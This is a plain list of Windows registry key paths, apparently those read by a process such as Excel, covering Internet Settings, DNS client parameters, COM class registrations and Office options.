HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers\SecureAutoProxy
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\FeatureEnableTokenBindingOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTlsAnonymousClientAuthFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyAuthenticationSchemes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyAuthenticationSchemes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyLinkLocalNameResolution
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyLinkLocalNameResolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9F6C78EF-FCE5-42FA-ABEA-3E7DF91921DC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\PolicyType
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Behavior
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\MergeAlgorithm
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirectMapped
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirect
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyname
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicypath
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyismultisz
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicymultiszSeparatorChar
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataUser
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataDevice
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataBoth
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\30Value
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Value
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\UBR
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpandedLines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpanded
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers\SendDnsToHost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableCachingNegativeProxyResults
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableCachingNegativeProxyResults
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp2Upgrade
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTcpFastOpen
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\PolicySubPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\DllPath
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\QuicTestHost
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\AutoProxyAutoLogonIfChallenged
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttpLowerCaseHost
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\windows\CurrentVersion\Internet Settings\WinHttpLowerCaseHost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NameBoxWidth
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\AMSI\FeatureBits
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\3dDialogs
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAccChecker
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ValidateResponseNames
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ValidateResponseNames
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableSmartNameResolution
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartNameResolution
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\PreferLocalOverLowerBindingDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\PreferLocalOverLowerBindingDNS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\QueryNetBTFQDN
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryNetBTFQDN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableSmartProtocolReordering
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartProtocolReordering
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UdpRecvBufferSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UdpRecvBufferSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EdnsMaxBufferSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EdnsMaxBufferSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableParallelAandAAAA
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableParallelAandAAAA
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableCoalescing
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableCoalescing
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\FilterVPNTrigger
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterVPNTrigger
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableMultiHomedRouteConflicts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMultiHomedRouteConflicts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ForceQueriesOverTcp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShareTcpConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TcpIgnoreInterfaceForServerSelection
